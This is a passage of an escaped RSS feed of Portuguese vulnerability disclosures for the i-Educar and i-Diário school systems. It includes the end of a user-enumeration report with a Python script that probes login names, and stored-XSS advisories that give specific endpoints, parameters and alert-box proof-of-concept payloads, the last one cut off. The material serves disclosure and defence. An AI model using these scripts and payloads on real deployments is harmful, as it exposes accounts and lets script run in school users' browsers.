&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;para&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;login&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;em&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;logins&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;response&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;requests&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;post&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;url&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;data&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;{&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;login&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;login&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;},&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;headers&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;headers&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;if&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;enviado&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;em&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;response&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;text&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;lower&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;():&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;print&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;sa&amp;#34;&amp;gt;f&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;[&#43;] &amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;{&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;login&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;}&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt; -&amp;amp;gt; EXISTE&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;elif&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;não encontramos&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;ow&amp;#34;&amp;gt;in&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;response&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;text&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;lower&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;():&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;print&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;sa&amp;#34;&amp;gt;f&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;[-] &amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;{&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;login&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;}&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt; -&amp;amp;gt; NÃO EXISTE&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Este script conseguiu confirmar quais usuários estão cadastrados no sistema com base no conteúdo da resposta do sistema.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Exposição de contas válidas: Os invasores podem confirmar quais usuários estão cadastrados no sistema.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Facilita ataques de força bruta: Usuários válidos podem ser alvo de tentativas automatizadas de adivinhação de senhas.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Preenchimento de credenciais: Contas descobertas podem ser testadas com senhas vazadas de outros serviços.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Phishing direcionado: Os invasores podem enviar e-mails manipulados por engenharia social para usuários confirmados, aumentando a taxa de sucesso de golpes.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Perda de privacidade: A simples confirmação da existência de um usuário pode expor dados confidenciais em determinados contextos (por exemplo, contas em serviços restritos ou confidenciais).&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Escalonamento de ataques: A enumeração de usuários pode servir como um passo inicial para explorar vulnerabilidades mais graves, como invasões de contas.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação: A percepção de falhas básicas de segurança pode afetar a credibilidade. do aplicativo com usuários e clientes.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://vuldb.com/?submit.627926&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://vuldb.com/?submit.627926&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/vanderlei-princival/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/vanderlei50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/vanderlei-princival/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Vanderlei Princival&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 18 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8918</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8918/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8918/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8918-cross-site-scripting-xss-armazenado-no-endpoint-educar_instituicao_cadphp-parâmetro-bairro&amp;#34;&amp;gt;CVE-2025-8918: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_instituicao_cad.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Bairro&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8918&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8918&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;/intranet/educar_instituicao_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Bairro&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_instituicao_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8918-cross-site-scripting-xss-armazenado-no-endpoint-educar_instituicao_cadphp-parâmetro-bairro&amp;#34;&amp;gt;CVE-2025-8918: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_instituicao_cad.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Bairro&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8918&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8918&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;/intranet/educar_instituicao_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Bairro&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_instituicao_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;Bairro&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;Bairro&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;svg&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onload&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(1)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8918/image.png&amp;#34;
	width=&amp;#34;1121&amp;#34;
	height=&amp;#34;480&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8918/image_hu_ca11c80f720a7acd.png 480w, /p/cve-2025-8918/image_hu_541791db714561e6.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;233&amp;#34;
		data-flex-basis=&amp;#34;560px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8918.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8918.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/f%C3%AAmartins/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Fernanda Martins&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 13 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8919</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8919/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8919/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8919-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-objetivos-de-aprendizagem-e-habilidades&amp;#34;&amp;gt;CVE-2025-8919: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;/objetivos-de-aprendizagem-e-habilidades&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8919&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8919&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;/objetivos-de-aprendizagem-e-habilidades&amp;lt;/code&amp;gt; do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;Código&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Objetivo/Habilidade&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/objetivos-de-aprendizagem-e-habilidades&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8919-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-objetivos-de-aprendizagem-e-habilidades&amp;#34;&amp;gt;CVE-2025-8919: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;/objetivos-de-aprendizagem-e-habilidades&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8919&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8919&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;/objetivos-de-aprendizagem-e-habilidades&amp;lt;/code&amp;gt; do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;Código&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Objetivo/Habilidade&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/objetivos-de-aprendizagem-e-habilidades&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros: &amp;lt;code&amp;gt;Código&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Objetivo/Habilidade&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;Código&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Objetivo/Habilidade&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span 